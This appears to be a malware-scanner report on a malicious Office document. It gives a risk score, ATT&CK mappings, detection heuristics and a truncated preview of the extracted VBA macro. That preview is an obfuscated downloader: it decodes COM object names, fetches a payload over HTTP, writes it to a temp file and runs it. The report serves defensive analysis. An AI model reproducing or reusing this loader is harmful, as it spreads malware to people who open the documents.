MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro, triggered automatically, uses `CreateObject` and `CallByName` to execute code that appears to download and run a second-stage payload. The obfuscation and auto-execution mechanism strongly suggest a malicious downloader.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5138 bytes |
SHA-256: 59142d27ddb2e923ce1f63193e9ef5a96c698f33227bdbe02f26ab70095c0225 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ghNCtWppVfZx(ByVal XpglqKjlfkLP As String, ByVal FoxjWhXVhRRv As String) As Boolean
Dim dHUvpLIBxbje As Object
Dim cDAtmgMwzifd As Variant
Dim uwYXZGZbVSYh As Integer
Dim FJIvzFapPoxp As Object
Dim AvNgMWAdFAwJ As String
On Error GoTo pZTjEVAdkvWl
AvNgMWAdFAwJ = LvEaAQLfcpSl("1/7/QUUIMNYsfwsfT/3MNYTN")
Set FJIvzFapPoxp = CreateObject(AvNgMWAdFAwJ)
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("ofqP"), 1, LvEaAQLfcpSl("UFH"), XpglqKjlfkLP, False
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("eofT"), 1
uwYXZGZbVSYh = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("tvubuT"), 2)
If uwYXZGZbVSYh <> 100 + 100 Then
GoTo pZTjEVAdkvWl
End If
cDAtmgMwzifd = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("zepCftopqtfS"), 2)
Set dHUvpLIBxbje = CreateObject(LvEaAQLfcpSl("nbfsuT/CEPEB"))
KgmBwNiAFOKP dHUvpLIBxbje
xYheJuZKfaQv dHUvpLIBxbje
awGBIfgvjbAc dHUvpLIBxbje, cDAtmgMwzifd
DsIbCsAMYYQK dHUvpLIBxbje, FoxjWhXVhRRv
PdLDSioJAVSH dHUvpLIBxbje
ghNCtWppVfZx = True
Exit Function
pZTjEVAdkvWl:
ghNCtWppVfZx = False
End Function
Private Function IIzjPkemqqnL()
IIzjPkemqqnL = LvEaAQLfcpSl("ovS")
End Function
Private Sub KgmBwNiAFOKP(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fqzU"), 4, 1
End Sub
Private Function KPKaiNEnahVT() As String
Dim rJrhievvCfyl As Object
Dim QXTQfpZtKexX As String
Dim SHgDlrOjRXLV
SHgDlrOjRXLV = LvEaAQLfcpSl("udfkcPnfutzTfmjG/hojuqjsdT")
Set rJrhievvCfyl = CreateObject(SHgDlrOjRXLV)
SHgDlrOjRXLV = LvEaAQLfcpSl("sfempGmbjdfqTufH")
QXTQfpZtKexX = CallByName(rJrhievvCfyl, SHgDlrOjRXLV, VbMethod, 2)
If QXTQfpZtKexX <> "" Then
KPKaiNEnahVT = QXTQfpZtKexX & LvEaAQLfcpSl("0") & Rnd
End If
End Function
Private Function FiqyDLoZMATY(ByVal LWZLTNNGxYir As String) As Integer
Dim JRtxRzUKmPqn
JRtxRzUKmPqn = 1
While Mid(LWZLTNNGxYir, JRtxRzUKmPqn, 1) <> ""
JRtxRzUKmPqn = JRtxRzUKmPqn + 1
Wend
FiqyDLoZMATY = JRtxRzUKmPqn - 1
End Function
Private Sub zPfxwgLIQVwW(ByVal XpglqKjlfkLP As String)
Dim lyvRMzbxdroI As String
Dim VbVQyuDWGZld As Object
Dim xKPXWuUjiAdg
On Error GoTo pZTjEVAdkvWl
lyvRMzbxdroI = KPKaiNEnahVT
ghNCtWppVfZx XpglqKjlfkLP, lyvRMzbxdroI
xKPXWuUjiAdg = LvEaAQLfcpSl("mmfiT/uqjsdTX")
Set VbVQyuDWGZld = CreateObject(xKPXWuUjiAdg)
CallByName VbVQyuDWGZld, LvEaAQLfcpSl("dfyF"), 1, lyvRMzbxdroI
Exit Sub
pZTjEVAdkvWl:
End Sub
Private Sub awGBIfgvjbAc(ByVal uKFgvPVMydzM As Variant, ByVal DDPDWEuozhSo As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fujsX"), 1, DDPDWEuozhSo
End Sub
Private Sub vzJhVatEBVoy()
Dim VeiNJzUrDrDg
Dim jJBTFGDHthQs
Dim JQOckBcjjlel
VeiNJzUrDrDg = LvEaAQLfcpSl("eJguiOnRphWC")
JQOckBcjjlel = IIzjPkemqqnL
jJBTFGDHthQs = CallByName(Application, JQOckBcjjlel, VbMethod, VeiNJzUrDrDg)
End Sub
Private Function LvEaAQLfcpSl(ByVal lrgPbThREpKm As String) As String
Dim aaZFeTqSvrER As Integer
Dim AnBobeUQDpDD As String
LvEaAQLfcpSl = ""
For aaZFeTqSvrER = 1 To FiqyDLoZMATY(lrgPbThREpKm)
AnBobeUQDpDD = Chr(NVWkzqvezZgf(lrgPbThREpKm, aaZFeTqSvrER) - 1)
LvEaAQLfcpSl = AnBobeUQDpDD & LvEaAQLfcpSl
Next aaZFeTqSvrER
End Function
Private Sub xYheJuZKfaQv(ByVal eqSYWaSfWYQK As Variant)
CallByName eqSYWaSfWYQK, LvEaAQLfcpSl("ofqP"), 1
End Sub
Private Sub CPSnyVKvrvnG()
Dim YTRFoEHLxOEW
Dim OHBcICEmNbzK
Dim uTnRUWANbrxQ
uTnRUWANbrxQ = IIzjPkemqqnL
YTRFoEHLxOEW = LvEaAQLfcpSl("zpWCFubWiK{w")
OHBcICEmNbzK = CallByName(Application, uTnRUWANbrxQ, VbMethod, YTRFoEHLxOEW)
End Sub
Private Sub SsoTJTiTYzij()
Dim FbufXBvHPPwJ
Dim xRqqKnhlVdEi
Dim AgVQNZUXlDyD
AgVQNZUXlDyD = IIzjPkemqqnL
FbufXBvHPPwJ = LvEaAQLfcpSl("HowswLWzoTQD")
xRqqKnhlVdEi = CallByName(Application, AgVQNZUXlDyD, VbMethod, FbufXBvHPPwJ)
End Sub
Private Sub PdLDSioJAVSH(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpS
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.